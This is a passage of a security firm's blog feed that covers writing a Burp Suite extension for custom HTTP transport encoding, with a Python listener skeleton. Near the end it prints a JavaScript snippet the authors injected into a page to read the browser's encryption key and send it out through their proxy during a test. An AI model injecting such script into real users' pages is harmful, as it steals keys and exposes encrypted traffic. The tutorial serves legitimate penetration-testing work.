&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-4" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-4" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-4"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-5" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-5" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-5"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-6" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-6" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-6"&gt;&lt;/a&gt;&lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Pentagrid late encoder"&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-7" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-7" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-7"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-8" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-8" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-8"&gt;&lt;/a&gt;&lt;span class="k"&gt;class&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nc"&gt;BurpExtender&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IBurpExtender&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;IHttpListener&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;IProxyListener&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-9" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-9" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-9"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-10" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-10" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-10"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;registerExtenderCallbacks&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-11" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-11" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-11"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-12" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-12" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-12"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# keep a reference to our callbacks object&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-13" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-13" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-13"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_callbacks&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;callbacks&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-14" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-14" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-14"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-15" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-15" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-15"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# obtain an extension helpers object&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-16" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-16" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-16"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_helpers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getHelpers&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-17" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-17" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-17"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-18" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-18" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-18"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# set our extension name&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-19" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-19" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-19"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setExtensionName&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-20" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-20" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-20"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-21" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-21" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-21"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# register ourselves as an HTTP listener&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-22" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-22" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-22"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;registerHttpListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-23" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-23" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-23"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;registerProxyListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-24" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-24" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-24"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-25" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-25" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-25"&gt;&lt;/a&gt;        &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"Loaded "&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s2"&gt;" successfully!"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-26" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-26" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-26"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-27" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-27" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-27"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-28" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-28" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-28"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;# implement IHttpListener&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-29" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-29" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-29"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-30" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-30" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-30"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-31" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-31" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-31"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;processHttpMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-32" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-32" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-32"&gt;&lt;/a&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TOOL_PROXY&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-33" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-33" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-33"&gt;&lt;/a&gt;            &lt;span class="c1"&gt;# Requests are handled as late as possible in processProxyMessage&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-34" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-34" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-34"&gt;&lt;/a&gt;            &lt;span class="k"&gt;return&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-35" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-35" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-35"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;filter_message&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-36" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-36" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-36"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-37" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-37" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-37"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-38" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-38" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-38"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;# implement IProxyListener&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-39" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-39" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-39"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-40" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-40" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-40"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;processProxyMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-41" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-41" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-41"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# Responses are handled as late as possible in processHttpMessage&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-42" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-42" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-42"&gt;&lt;/a&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-43" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-43" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-43"&gt;&lt;/a&gt;            &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;filter_message&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TOOL_PROXY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getMessageInfo&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-44" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-44" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-44"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-45" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-45" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-45"&gt;&lt;/a&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-46" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-46" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-46"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;filter_message&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-47" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-47" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-47"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# TODO: implement encoding&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-48" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-48" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-48"&gt;&lt;/a&gt;        &lt;span class="k"&gt;pass&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="bonus"&gt;
&lt;h2&gt;Bonus&lt;/h2&gt;
&lt;p&gt;To make this a little more convenient for you, we've set up a &lt;a class="reference external" href="https://github.com/pentagridsec/PentagridBurpTransportEncoding"&gt;Github repository&lt;/a&gt; with all the examples from above (in the "minimal" subfolder). However, that's not all:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;A fully working example for the zlib-body encoding/decoding.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;A template that has some more helpful functions if you want to implement your own decoding/encoding.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;An additional extension that implements an IMessageEditorTabFactory, so if you encounter an encoded message in Burp you can click the message viewer option of the extension and will see it in decoded form.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="more-advanced-examples"&gt;
&lt;h2&gt;More advanced examples&lt;/h2&gt;
&lt;p&gt;With the above examples it should be no problem for you to also create extensions that do decryption/encryption instead of decoding/encoding in more complicated setups. In one of our security analysis, we were able to implement the decryption/encryption and hardcoded the key at first. However, then we realised we could additionally inject a JavaScript tag into the HTML single-page response of the server to "steal" our own encryption key from our browser. This removed the requirement to hard-code the encryption key. We did this by replacing &lt;code class="docutils literal"&gt;&amp;lt;/body&amp;gt;&lt;/code&gt; with:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code html"&gt;&lt;a id="rest_code_7e2805ef1f8a40cdb3156ff57c596351-1" name="rest_code_7e2805ef1f8a40cdb3156ff57c596351-1" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_7e2805ef1f8a40cdb3156ff57c596351-1"&gt;&lt;/a&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;let&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;lastKey&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;pentagrid&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="kd"&gt;let&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;nowKey&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;encryptionKey&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;nowKey&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;nowKey&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;lastKey&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;&lt;span class="nx"&gt;lastKey&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;nowKey&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;let&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;pentagrid2&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="ow"&gt;new&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;XMLHttpRequest&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;pentagrid2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"GET"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"/pentagridDiscloseKey="&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;nowKey&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;pentagrid2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;);}};&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;setInterval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;pentagrid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;500&lt;/span&gt;&lt;span class="p"&gt;);&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This JavaScript extracted the encryption key from the browser DOM and sent it through Burp, so we could catch it in our decrypter/encrypter extensions and therefore fully intercept cleartext traffic.&lt;/p&gt;
&lt;p&gt;Happy hacking!&lt;/p&gt;
&lt;/section&gt;</description><category>API</category><category>Burp</category><category>Encryption</category><category>Extensions</category><category>Pentesting</category><category>Portswigger</category><category>Transport Encoding</category><guid>https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/</guid><pubDate>Wed, 13 Apr 2022 10:42:00 GMT</pubDate></item><item><title>Response Overview Burp Extension</title><link>https://www.pentagrid.ch/en/blog/response_overview_burp_extension/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;Today we would like to announce the release of an updated BurpSuite extension in the BApp store.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
